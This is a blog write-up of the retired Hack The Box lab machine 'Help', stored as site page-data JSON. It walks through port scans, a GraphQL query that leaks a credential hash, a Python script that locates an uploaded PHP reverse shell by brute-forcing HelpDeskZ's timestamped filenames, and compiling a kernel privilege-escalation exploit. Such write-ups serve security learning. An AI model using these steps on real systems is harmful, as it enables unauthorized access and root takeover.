{"componentChunkName":"component---src-templates-post-template-js","path":"/hackthebox-linux-help-en","result":{"data":{"markdownRemark":{"id":"2731d410-b1e1-54ef-bcfa-c1d31e11c152","html":"<blockquote>\n<p>This page has been machine-translated from the <a href=\"/hackthebox-linux-help\">original page</a>.</p>\n</blockquote>\n<p>I use the penetration-testing learning platform “Hack The Box” to study security.\nAt the time of writing, my rank on Hack The Box is ProHacker.</p>\n<span class=\"gatsby-resp-image-wrapper\" style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 220px; \">\n      <a class=\"gatsby-resp-image-link\" href=\"/static/cd7b990a73c9cfb4287e4de57a203289/c8042/327080.png\" style=\"display: block\" target=\"_blank\" rel=\"noopener\">\n    <span class=\"gatsby-resp-image-background-image\" style=\"padding-bottom: 22.727272727272727%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAABVklEQVQY0zWPu04CURRF5y/sbbTRKCMKzL3DDDMggwhBcBAMIAHFGN9oISo+OystjJWxNLG18BP8qru8aCx2TrKTs846xvWgz9npvroaHBCuVcmtVMmXqxTDdcr1JvWNLrlSiPCyuNllFpI+blDA8gJkOofwA6IyhWk5Sgfj4+1Sfb4/8P31ys2wT2fnkP7ZOb29I3aPT7m4uafZ7eEur1BptPXBkHKtQXdrk7Vmm0Zni5iTHgGZE54yhrcFHp8G6uX5jvvhCYVwg/X2trYpIv08tVaPpLfEXKFOxC8x6+R1n6LfEggnSdq3mYm7mAmpZmImRrE6rjq7ARfnLTrtCl7FIl9zyVQEQS3BUl3ilwRWxiazGkfmbL2cYl662sjV72ozy2M2YeKHY8qYikzoYlLZzjxRIUmkxV98ibU4yggmiaVsZFZPdwTURtZ/nF9wJC7VdNTkB317wL9z6DJMAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"></span>\n  <picture>\n          <source srcset=\"/static/cd7b990a73c9cfb4287e4de57a203289/b5458/327080.webp 220w\" sizes=\"(max-width: 220px) 100vw, 220px\" type=\"image/webp\">\n          <source srcset=\"/static/cd7b990a73c9cfb4287e4de57a203289/c8042/327080.png 220w\" sizes=\"(max-width: 220px) 100vw, 220px\" type=\"image/png\">\n          <img class=\"gatsby-resp-image-image\" src=\"/static/cd7b990a73c9cfb4287e4de57a203289/c8042/327080.png\" alt=\"Hack The Box\" title=\"Hack The Box\" loading=\"lazy\" style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\">\n        </picture>\n  </a>\n    </span>\n<p>This time I am writing up the retired HackTheBox machine “Help”.</p>\n<!-- omit in toc -->\n<h2 id=\"about-this-article\" style=\"position:relative;\"><a href=\"#about-this-article\" aria-label=\"about this article permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>About This Article</h2>\n<p><strong>The content of this article is not intended to encourage acts that are contrary to social order.</strong></p>\n<p>Please note that attempting attacks against environments other than those you own or are authorized to use may violate the Act on the Prohibition of Unauthorized Computer Access (the Unauthorized Access Prohibition Act).</p>\n<p>All statements here are my own and do not represent any organization I belong to.</p>\n<!-- omit in toc -->\n<h2 id=\"table-of-contents\" style=\"position:relative;\"><a href=\"#table-of-contents\" aria-label=\"table of contents permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Table of Contents</h2>\n<ul>\n<li><a href=\"#enumeration\">Enumeration</a></li>\n<li><a href=\"#privilege-escalation\">Privilege Escalation</a></li>\n</ul>\n<h2 id=\"enumeration\" style=\"position:relative;\"><a href=\"#enumeration\" aria-label=\"enumeration permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Enumeration</h2>\n<p>As usual, I started with a port scan.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ <span class=\"token function\">sudo</span> <span class=\"token function\">sed</span> -i <span class=\"token string\">'s/^[0-9].*$RHOST/10.10.10.121  $RHOST/g'</span> /etc/hosts\n$ nmap -sV -sC -Pn -T4 <span class=\"token variable\">$RHOST</span><span class=\"token operator\">|</span> <span class=\"token function\">tee</span> nmap1.txt\n$ nmap -p- <span class=\"token variable\">$RHOST</span> -Pn -sC -sV -A  <span class=\"token operator\">|</span> <span class=\"token function\">tee</span> nmap_max.txt</code></pre></div>\n<p>Port 3000 being exposed externally seemed unusual, but I started by looking at port 80 first.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">PORT     STATE SERVICE VERSION\n<span class=\"token number\">22</span>/tcp   <span class=\"token function\">open</span>  <span class=\"token function\">ssh</span>     OpenSSH <span class=\"token number\">7</span>.2p2 Ubuntu 4ubuntu2.6 <span class=\"token punctuation\">(</span>Ubuntu Linux<span class=\"token punctuation\">;</span> protocol <span class=\"token number\">2.0</span><span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span> ssh-hostkey: \n<span class=\"token operator\">|</span>   <span class=\"token number\">2048</span> e5:bb:4d:9c:de:af:6b:bf:ba:8c:22:7a:d8:d7:43:28 <span class=\"token punctuation\">(</span>RSA<span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span>   <span class=\"token number\">256</span> d5:b0:10:50:74:86:a3:9f:c5:53:6f:3b:4a:24:61:19 <span class=\"token punctuation\">(</span>ECDSA<span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span>_  <span class=\"token number\">256</span> e2:1b:88:d3:76:21:d4:1e:38:15:4a:81:11:b7:99:07 <span class=\"token punctuation\">(</span>ED25519<span class=\"token punctuation\">)</span>\n<span class=\"token number\">80</span>/tcp   <span class=\"token function\">open</span>  http    Apache httpd <span class=\"token number\">2.4</span>.18\n<span class=\"token operator\">|</span>_http-title: Did not follow redirect to http://help.htb/\n<span class=\"token operator\">|</span>_http-server-header: Apache/2.4.18 <span class=\"token punctuation\">(</span>Ubuntu<span class=\"token punctuation\">)</span>\n<span class=\"token number\">3000</span>/tcp <span class=\"token function\">open</span>  http    Node.js Express framework\n<span class=\"token operator\">|</span>_http-title: Site doesn't have a title <span class=\"token punctuation\">(</span>application/json<span class=\"token punctuation\">;</span> <span class=\"token assign-left variable\">charset</span><span class=\"token operator\">=</span>utf-8<span class=\"token punctuation\">)</span>.\nService Info: Host: <span class=\"token number\">127.0</span>.1.1<span class=\"token punctuation\">;</span> OS: Linux<span class=\"token punctuation\">;</span> CPE: cpe:/o:linux:linux_kernel</code></pre></div>\n<p>Connecting to port 80 redirected to <code class=\"language-text\">help.htb</code>, so I edited the hosts file accordingly.</p>\n<p>Unfortunately the top page did not contain anything interesting.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 916px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/0a0c2f52fd19182bb28cd696c2887860/59822/image-20220808150531914.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 47.91666666666667%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAIAAAA7N+mxAAAACXBIWXMAAAsTAAALEwEAmpwYAAACMUlEQVQoz01Q2U5TURTtT0BrVKbESDQK+qL45DsWMcEOKmJieFD+QZKW+OCLPolpiyZCjJr4A1raW6DDHdo7nOne29sBaktbaNPSAUol8ZRg4snKytpnZe+9sk2XRsfHbkxcG7t1ffz26JWbg8OX+8wD/ZbBfvP/GDBbhiznhk8xdP7CyODI1b6LY6Z7UzbHo+d22+yMfe6h49nj2fmpaaf1vqPH084z/cA5abWdfjomrTM2+9yTp/MTd+6asvlSo7pffPOiDoVqu8MLAhdPiJIc43hRUignJDkciRZKe43WYe2g2Wi1C8VyrlBdXftq2smXc9tZ8M2bUsR2p9totiiarXaP/+la/aDVPup0jg+POsfdbnm/ms2VfR8/m8gPf+yle33h9cbCkvpq2XD7DJfXcHky775k3n+nZdLlSS35DLdXXVzWXB5j8YP6di2bLa58WjUBBSNRSgKkKVAREjIfB/EEiIuQRucEJMm0lDhe4gQiA1WBKCGmNCOXr/Q2Y6IDqCCMMMaEEISgYRiYYAABRADQ2QSrKoEQZDLp3eJutVqp1erbv/dWaDMbx8GIHIoBJiJvsDAUVahmRcJLKieSWBxvsoCJytQNbIlhHsVEPczBzE6pF5sG9AdCTGgrwGz89Ad/rTOhzUg4yrKcwAuJGMsHmU1/gImyvAKxDBDEWnYnf7ZZT6YJRvSpBGuahqmLsSTLGCNd19PpFHWTSZ0mL9LMlcrJyZ9Go0mvTZv/AqMBoPuUM8iqAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/0a0c2f52fd19182bb28cd696c2887860/8ac56/image-20220808150531914.webp 240w,\n/static/0a0c2f52fd19182bb28cd696c2887860/d3be9/image-20220808150531914.webp 480w,\n/static/0a0c2f52fd19182bb28cd696c2887860/3fccf/image-20220808150531914.webp 916w\"\n              sizes=\"(max-width: 916px) 100vw, 916px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/0a0c2f52fd19182bb28cd696c2887860/8ff5a/image-20220808150531914.png 240w,\n/static/0a0c2f52fd19182bb28cd696c2887860/e85cb/image-20220808150531914.png 480w,\n/static/0a0c2f52fd19182bb28cd696c2887860/59822/image-20220808150531914.png 916w\"\n            sizes=\"(max-width: 916px) 100vw, 916px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/0a0c2f52fd19182bb28cd696c2887860/59822/image-20220808150531914.png\"\n            alt=\"image-20220808150531914\"\n            title=\"image-20220808150531914\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Running gobuster on the directories revealed that a system called <a href=\"https://www.helpdeskz.com/\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">HelpDeskZ</a> was running.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/88bea77cd363c3fde5dad7abf2f5deea/3fca6/image-20220808150742606.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 52.5%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAIAAADwazoUAAAACXBIWXMAAAsTAAALEwEAmpwYAAABSElEQVQoz5WQTUsCURSG7x/IsRapLZKKLFpE9ANLskZsbAybIAc1UCM3LfsJQdQqIyhoGzTN5Nd83a+507EIZqGCDy+Xew/3fTnnoHR6a2Nzdz2zs7qynUytSQtLc1JykmLxlBRPxaRkIrE8v5hBSvVUa+hqRcvrJ5V2vdZuXDRrE9Wq61eXeqvevLmutKroqdt5fHl47nS0O+3NfA3DkAdMiGCsgpE4nIxTLjjK3uaU/HGhUJCP5KKi5EYc7gN705U9yMros2uYljUcAH3AsizTNA3D6PXgNRirQd/+7n3dv58jSqnv+zyAfgRnzHYc23Y45+FURCgc+oHA6bguZWBkEDS0wevAXURmhSxCKBSjC4AI5Hme67r8H8jCGDPGRQSwwTeIjhZhbQhzTBghBGOCwxlBMO1vy+yv1ZlAqqqelcsltVScnR+migFPP+oU0AAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/88bea77cd363c3fde5dad7abf2f5deea/8ac56/image-20220808150742606.webp 240w,\n/static/88bea77cd363c3fde5dad7abf2f5deea/d3be9/image-20220808150742606.webp 480w,\n/static/88bea77cd363c3fde5dad7abf2f5deea/e46b2/image-20220808150742606.webp 960w,\n/static/88bea77cd363c3fde5dad7abf2f5deea/01adf/image-20220808150742606.webp 1112w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/88bea77cd363c3fde5dad7abf2f5deea/8ff5a/image-20220808150742606.png 240w,\n/static/88bea77cd363c3fde5dad7abf2f5deea/e85cb/image-20220808150742606.png 480w,\n/static/88bea77cd363c3fde5dad7abf2f5deea/d9199/image-20220808150742606.png 960w,\n/static/88bea77cd363c3fde5dad7abf2f5deea/3fca6/image-20220808150742606.png 1112w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/88bea77cd363c3fde5dad7abf2f5deea/d9199/image-20220808150742606.png\"\n            alt=\"image-20220808150742606\"\n            title=\"image-20220808150742606\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>I found a contact form and tried a blind XSS attack, but it did not appear to work.</p>\n<p>Next, I found the following exploit:</p>\n<p>Reference: <a href=\"https://www.exploit-db.com/exploits/40300\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">HelpDeskZ 1.0.2 - Arbitrary File Upload - PHP webapps Exploit</a></p>\n<p>It appeared to abuse unrestricted file-type checking on uploaded files, but PHP uploads were rejected by the uploader on the target.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 893px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/8c1998261c39c1371ec08bb9a600a696/6c745/image-20220808193445422.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 56.25%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAYAAAB/Ca1DAAAACXBIWXMAAAsTAAALEwEAmpwYAAABf0lEQVQoz52SX0vDMBTF+9n3KDI20P1x4JB1dA6GA0HwA4igD0MQ57u4sW5d1zZpkzbtMTeu4nxZMfDrvTTJuSc3sRbxEg8fj5i9zPD+PMfkaYLB3MZ/h2UPbHTve7h8vYL9NsLJ3Slq7RqmN1M4Iwfj8TUcx8FwOKyE1Wqe4+y2hfa8h9a8i879BfqdPtqdNhqNBprNJur1usmrYJFNJZX+HFovigJpliFNU2Q6Vj6yEBKcczDOIKSATKURiIUAi2NDyBgiRmu4ycMoQqAxuZmjSPMRLHLA9aZYQ0JEnucQ/hZs8Qm2XCBeu4i9DeLN+iiWlBJBEIDpKrnKfwSl/sdXK3B3hWTrQex8U+QYxiG5S5LE9IsKkGDIIqw9D65G7ntYVOkh9SwUIUQmIUSCiAdasEAYhli7Lrh2btD9IyLdOyqulDLQ5f3GIjfKoFDmNEjQ3/rfF7YXJLGdPjqdhNYSJFK+CuPwr+VygjZTb4W+bXJE0RTxtWCWHqwtI40vPiUuFIBxdewAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/8c1998261c39c1371ec08bb9a600a696/8ac56/image-20220808193445422.webp 240w,\n/static/8c1998261c39c1371ec08bb9a600a696/d3be9/image-20220808193445422.webp 480w,\n/static/8c1998261c39c1371ec08bb9a600a696/f0cd5/image-20220808193445422.webp 893w\"\n              sizes=\"(max-width: 893px) 100vw, 893px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/8c1998261c39c1371ec08bb9a600a696/8ff5a/image-20220808193445422.png 240w,\n/static/8c1998261c39c1371ec08bb9a600a696/e85cb/image-20220808193445422.png 480w,\n/static/8c1998261c39c1371ec08bb9a600a696/6c745/image-20220808193445422.png 893w\"\n            sizes=\"(max-width: 893px) 100vw, 893px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/8c1998261c39c1371ec08bb9a600a696/6c745/image-20220808193445422.png\"\n            alt=\"image-20220808193445422\"\n            title=\"image-20220808193445422\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>However, it turned out that even when the “File is not allowed” message appears, the file upload itself still succeeds — so the earlier exploit did work after all.</p>\n<p>※ The reason it did not work initially in my local container was likely because my container’s clock was set to JST instead of UTC.</p>\n<p>As an alternative approach, I also explored the GraphQL endpoint on port 3000, which let me retrieve a username and password to log in.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ <span class=\"token function\">curl</span> <span class=\"token string\">'http://help.htb:3000/graphql/'</span> -H <span class=\"token string\">'Content-Type: application/json'</span> --data <span class=\"token string\">'{\"query\": \"{user {username, password}}\"}'</span>\n\n<span class=\"token punctuation\">{</span><span class=\"token string\">\"data\"</span>:<span class=\"token punctuation\">{</span><span class=\"token string\">\"user\"</span>:<span class=\"token punctuation\">{</span><span class=\"token string\">\"username\"</span><span class=\"token builtin class-name\">:</span><span class=\"token string\">\"helpme@helpme.com\"</span>,<span class=\"token string\">\"password\"</span><span class=\"token builtin class-name\">:</span><span class=\"token string\">\"5d3c93182bb20f07b994a7f617e99cff\"</span><span class=\"token punctuation\">}</span><span class=\"token punctuation\">}</span><span class=\"token punctuation\">}</span></code></pre></div>\n<p>After changing the timezone to UTC and uploading the file, I ran the following exploit to identify the URL and successfully obtained a shell.</p>\n<div class=\"gatsby-highlight\" data-language=\"php\"><pre class=\"language-php\"><code class=\"language-php\">import hashlib\nimport time\nimport sys\nimport requests\nimport calendar\n\nhelpdeskzBaseUrl <span class=\"token operator\">=</span> <span class=\"token string double-quoted-string\">\"http://help.htb/support/uploads/tickets/\"</span> <span class=\"token comment\"># change this</span>\nfileName <span class=\"token operator\">=</span> <span class=\"token string double-quoted-string\">\"php-reverse-shell.php\"</span> <span class=\"token comment\"># Your reverse shell</span>\nresponse <span class=\"token operator\">=</span> requests<span class=\"token operator\">.</span><span class=\"token function\">head</span><span class=\"token punctuation\">(</span><span class=\"token string single-quoted-string\">'http://10.10.10.121'</span><span class=\"token punctuation\">)</span> <span class=\"token comment\"># Change this</span>\nserverTime<span class=\"token operator\">=</span>response<span class=\"token operator\">.</span>headers<span class=\"token punctuation\">[</span><span class=\"token string single-quoted-string\">'Date'</span><span class=\"token punctuation\">]</span> <span class=\"token comment\"># getting the server time</span>\ntimeFormat<span class=\"token operator\">=</span><span class=\"token string double-quoted-string\">\"%a, %d %b %Y %H:%M:%S %Z\"</span>\ncurrentTime <span class=\"token operator\">=</span> <span class=\"token keyword type-declaration\">int</span> <span class=\"token punctuation\">(</span>calendar<span class=\"token operator\">.</span><span class=\"token function\">timegm</span><span class=\"token punctuation\">(</span>time<span class=\"token operator\">.</span><span class=\"token function\">strptime</span><span class=\"token punctuation\">(</span>serverTime<span class=\"token punctuation\">,</span>timeFormat<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">for</span> x in <span class=\"token function\">range</span><span class=\"token punctuation\">(</span><span class=\"token number\">0</span><span class=\"token punctuation\">,</span> <span class=\"token number\">800</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n   <span class=\"token class-name return-type\">plaintext</span> <span class=\"token operator\">=</span> fileName <span class=\"token operator\">+</span> <span class=\"token function\">str</span><span class=\"token punctuation\">(</span>currentTime <span class=\"token operator\">-</span> x<span class=\"token punctuation\">)</span>\n   md5hash <span class=\"token operator\">=</span> hashlib<span class=\"token operator\">.</span><span class=\"token function\">md5</span><span class=\"token punctuation\">(</span>plaintext<span class=\"token operator\">.</span><span class=\"token function\">encode</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token operator\">.</span><span class=\"token function\">hexdigest</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n   url <span class=\"token operator\">=</span> helpdeskzBaseUrl<span class=\"token operator\">+</span>md5hash<span class=\"token operator\">+</span><span class=\"token string single-quoted-string\">'.php'</span>\n   <span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span>url<span class=\"token punctuation\">)</span>\n   response <span class=\"token operator\">=</span> requests<span class=\"token operator\">.</span><span class=\"token function\">head</span><span class=\"token punctuation\">(</span>url<span class=\"token punctuation\">)</span>\n   <span class=\"token keyword\">if</span> response<span class=\"token operator\">.</span>status_code <span class=\"token operator\">==</span> <span class=\"token number\">200</span><span class=\"token punctuation\">:</span>\n      <span class=\"token keyword\">print</span> <span class=\"token punctuation\">(</span><span class=\"token string double-quoted-string\">\"found!\"</span><span class=\"token punctuation\">)</span>\n      <span class=\"token keyword\">print</span> <span class=\"token punctuation\">(</span>url<span class=\"token punctuation\">)</span>\n      sys<span class=\"token operator\">.</span><span class=\"token keyword\">exit</span><span class=\"token punctuation\">(</span><span class=\"token number\">0</span><span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">print</span> <span class=\"token punctuation\">(</span><span class=\"token string double-quoted-string\">\"Sorry, I did not find anything\"</span><span class=\"token punctuation\">)</span></code></pre></div>\n<h2 id=\"privilege-escalation\" style=\"position:relative;\"><a href=\"#privilege-escalation\" aria-label=\"privilege escalation permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Privilege Escalation</h2>\n<p>With a User shell obtained, I moved on to privilege escalation.</p>\n<p>The approach was straightforward — I used a kernel exploit.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token comment\"># Linux Kernel &lt; 4.4.0-116</span>\n<span class=\"token comment\"># searchsploit -m exploits/linux/local/44298.c</span>\n$ gcc -pthread <span class=\"token number\">44298</span>.c -o <span class=\"token number\">44298</span>.bin</code></pre></div>\n<p>I wonder why DirtyCow, which I tried before this, did not work.</p>","fields":{"slug":"/hackthebox-linux-help-en","tagSlugs":["/tag/hack-the-box-en/","/tag/linux-en/","/tag/easy-box-en/","/tag/english/"]},"frontmatter":{"date":"2022-08-08","description":"A writeup of the retired HackTheBox machine 'Help'.","tags":["HackTheBox (en)","Linux (en)","EasyBox (en)","English"],"title":"HackTheBox Writeup: Help (Easy/Linux)","socialImage":{"publicURL":"/static/dc4d8b7f8795f3c3d3489d9957d155f2/no-image.png"}}}},"pageContext":{"slug":"/hackthebox-linux-help-en"}},"staticQueryHashes":["251939775","401334301","825871152"]}